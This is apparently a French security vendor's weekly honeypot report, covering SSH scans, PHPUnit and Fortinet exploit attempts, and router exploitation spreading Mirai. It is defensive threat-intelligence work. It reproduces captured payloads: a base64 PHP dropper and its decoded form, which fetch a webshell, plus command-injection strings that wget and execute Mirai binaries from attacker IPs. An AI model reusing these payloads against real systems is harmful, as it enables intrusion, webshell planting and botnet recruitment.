Honeypots : activité de la semaine 43

En semaine 43, TEHTRIS a choisi de mettre en évidence 4 activités malveillante observées sur son réseau de honeypots de TEHTRIS déployé à l’international.

Sommaire

Scan SSH : ciblage de serveurs de jeux terraria

Cette semaine, 10 adresses IP ont tenté d’utiliser le login « terraria » (et variants) à plus de 560 reprises sur le réseau de honeypots de TEHTRIS.

IP source Count percentages AS Country
194.163.148[.]7 27.629% AS 51167 ( Contabo GmbH ) DE
139.99.9[.]147 21.925% AS 16276 ( OVH SAS ) SG
15.235.114[.]79 13.904% AS 16276 ( OVH SAS ) CA
167.86.69[.]67 8.378% AS 51167 ( Contabo GmbH ) DE
173.212.196[.]6 7.487% AS 51167 ( Contabo GmbH ) DE
135.125.194[.]20 4.635% AS 16276 ( OVH SAS ) DE
194.163.149[.]141 4.635% AS 51167 ( Contabo GmbH ) DE
51.222.12[.]137 4.635% AS 16276 ( OVH SAS ) CA
194.233.80[.]38 4.456% AS 141995 ( Contabo Asia Private Limited ) SG
137.74.0[.]223 2.317% AS 16276 ( OVH SAS ) PL

Ces 10 adresses IP ont testé les 27 mêmes combinaisons login / password.

Il est vraisemblable que ces scans SSH visent à détecter et compromettre des serveurs de jeu Terraria. TEHTRIS recommande vivement de toujours changer ses identifiants par défaut afin de ne pas exposer ses serveurs aux scans automatiques.

Focus sur l’IP 51.77.247[.]119

L’adresse IP française 51.77.247[.]119, enregistrée auprès de l’AS 16276 (OVH SAS), a lancé une requête web le 30/10/22 sur une infrastructure lituanienne contenant :

  • L’URL /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, qui rend possible l’exploitation de la vulnérabilité CVE-2017-9841  (CVSS3 : 9.8) de PHPUnit, qui permet à un attaquant d’exécuter du code à distance sur un site vulnérable
  • La requête suivante encodée en base 64 dans les Raw Data :
				
					<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9wYXN0ZWJpbi5wbC92aWV3L3Jhdy83ZDM4N2YxZSIsIkJ1Z3oucGhwIikpIHsKCWVjaG8gIlN1a3Nlc2dibGsiOwp9IGVsc2UgewoJZWNobyAiZmFpbCI7Cn0KPz4=')); ?>
				
			

Décodé du base 64 :

				
					<?php
function adminer($url, $isi) {
	$fp = fopen($isi, "w");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_FILE, $fp);
	return curl_exec($ch);
	curl_close($ch);
	fclose($fp);
	ob_flush();
	flush();
}
if(adminer("https[:]//pastebin[.]pl/view/raw/7d387f1e","Bugz.php")) {
	echo "Suksesgblk";
} else {
	echo "fail";
}
?>
				
			

La fonction que cherche à exécuter l’attaquant, vraisemblablement en exploitant la vulnérabilité CVE-2017-9841, vise à télécharger un fichier depuis l’URL https[:]//pastebin[.]pl/view/raw/7d387f1e. Cet URL est défavorablement connu des bases de données, notamment pour avoir téléchargé un fichier (sha256 : 753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b) contenant un webshell PHP obfusqué. Ce webshell est appelé FoxAutoV5 et est disponible sur https[:]//anonymousfox[.]co.

FoxAutoV5 (sha256 : 753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b)

Il comprend de nombreuses fonctionnalités d’exploration et de recherche d’information sur une machine compromise, permettant à l’attaquant de connaître son environnement : où se trouvent les données avec des mots de passe, les vulnérabilités, il fournit des capacités de bruteforce et de déplacement latéral etc. Ce webshell n’est pas très protégé (il n’y a pas de mot de passe pour y accéder, par exemple) mais est suffisamment bien encodé pour rendre inefficaces certaines recherches statiques et éviter d’être détecté. D’ailleurs, son score sur VirusTotal est seulement de 2 / 61.  

Par ailleurs, l’IP 51.77.247[.]119 à l’origine de cet événement est apparue dans des fichiers malveillants exploitant la vulnérabilité Log4j (mentionnée en semaine 42).

Exploitation de vulnérabilités sur des routeurs pour propager Mirai

User agent "Momentum"

2 adresses IP sont associées au User Agent « Momentum » et envoient la requête URL suivante :

				
					/GponForm/diag_Form?images/
				
			

Cet URL vise à exploiter la vulnérabilité CVE-2018-10561 (CVSS3 : 9.8), concernant les routeurs Dasan GPON et permet à un attaquant de contourner l’authentification (mentionnée en semaine 39).

Si la vulnérabilité est exploitable, le Header indique le serveur qui sera contacté pour télécharger un fichier malveillant (possiblement une backdoor Mirai). Ainsi :

  • L’IP américaine 193.47.61[.]60 (AS 211252 DELIS LLC) est associée au header ‘XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http[:]//185.132.53[.]105g -O-|sh&ipv=0′
  • L’IP singapourienne 185.132.53[.]136 (AS 202437 – Julian Achter) est associée au header ‘XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http[:]//45.95.55[.]214/o/g -O-|sh&ipv=0′

 

L’IP allemande 45.95.55[.]214 (AS 200303 – LUMASERV Systems) est connue pour propager Mirai. Par ailleurs, le botnet Momentum ciblant des systèmes Linux a été révélé fin 2019, notamment pour distribuer des backdoors de Mirai et enrôler des appareils pour réaliser des attaques de dénis de service.

User agent "r00ts3c-owned-you"

10 adresses IP font des scans pour trouver des vulnérabilités connues dans certaines versions des routeurs ZyXEL, Billion (mentionnée en semaine 39) et D-Link pour diffuser le botnet Mirai.

IP source

AS

Country

111.118.40[.]97

AS 7562 ( HCN Dongjak )

KR

137.25.54[.]5

AS 20115 ( CHARTER-20115 )

US

209.93.149[.]48

AS 6871 ( British Telecommunications PLC )

GB

59.187.205[.]166

AS 7562 ( HCN Dongjak )

KR

143.159.103[.]77

AS 6871 ( British Telecommunications PLC )

GB

172.91.47[.]43

AS 20001 ( TWC-20001-PACWEST )

US

74.108.124[.]79

AS 701 ( UUNET )

US

75.67.32[.]138

AS 7922 ( COMCAST-7922 )

US

88.105.235[.]114

AS 9105 ( TalkTalk )

GB

92.14.135[.]177

AS 9105 ( TalkTalk )

GB

Dans les rawdata, deux types de commandes sont observées :

				
					' remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http[:]//134.195.138[.]33/.nCKx/zx.arm7+-O+arm7;chmod+777+arm7;./arm7 selfr'

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=;cd /tmp;wget http[:]//46.19.141[.]122/zyxel;chmod 777 zyxel;sh zyxel;rm -rf arm7;#&r'
				
			

Les IP 134.195.138[.]33 (US – AS 35913 – DEDIPATH-LLC) et 46.19.141[.]122 (CH – AS 51852 – Private Layer INC) sont connus pour distribuer le botnet Mirai. L’IP suisse était notamment contenue dans les fichiers SHA256 f4a46b4bc24cc2a0ce33d32ee057f31c1370c52caa3c8813669069a1d7351066 et  40efadebd319686595727d07b7b1e1518a89074098c05a2a746f7846efe1e161.

Tentative d’exploitation d’une vulnérabilité de Fortinet

Suite à un PoC publié en octobre 2022 par Horizon3 à propos de la vulnérabilité de Fortinet CVE-2022-40684 (CVSS3 : 9,8) grâce à laquelle un attaquant peut se connecter en tant qu’administrateur, TEHTRIS observe que ce PoC a été utilisé par des attaquants, reprenant la même URL (/api/v2/cmdb/system/admin/admin), le même User Agent (« Report Runner ») et le même header (à l’exception du port qui a été changé de 8888 à 9000) :

				
					['forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;', 'connection: close', 'content-type: application/json', 'accept-encoding: gzip'] 
				
			

6 adresses IP (dont 4 sont inconnues des bases de données publiques) effectuent ces requêtes, vraisemblablement dans un scan de plusieurs vulnérabilités qui inclut la CVE-2021-26086 (CVSS3 : 5,3) affectant le serveur and Data Center de Atlassian Jira.

IoC :

IP source

AS

Country

139.59.85[.]24

AS 14061 ( DIGITALOCEAN-ASN )

IN

159.65.199[.]18

AS 14061 ( DIGITALOCEAN-ASN )

NL

167.172.246[.]222

AS 14061 ( DIGITALOCEAN-ASN )

US

172.105.91[.]134

AS 63949 ( Linode, LLC )

DE

172.105.98[.]145

AS 63949 ( Linode, LLC )

CA

178.128.43[.]0

AS 14061 ( DIGITALOCEAN-ASN )

GB

Pour rappel, des attaquants utilisent des systèmes automatisés pour scanner de grandes portions d’internet afin de trouver des vulnérabilités à exploiter. Ne leur laissez pas la porte ouverte !

Cyber or not Cyber ?

Abonnez-vous à la newsletter TEHTRIS.

Une fois par mois, soyez au courant de l’actualité cyber en vous abonnant à la newsletter TEHTRIS.

Pour pousser le sujet

Publications similaires

Cyber or not cyber ?

Une fois par mois, soyez au courant de l’actualité cyber en vous abonnant à la newsletter TEHTRIS.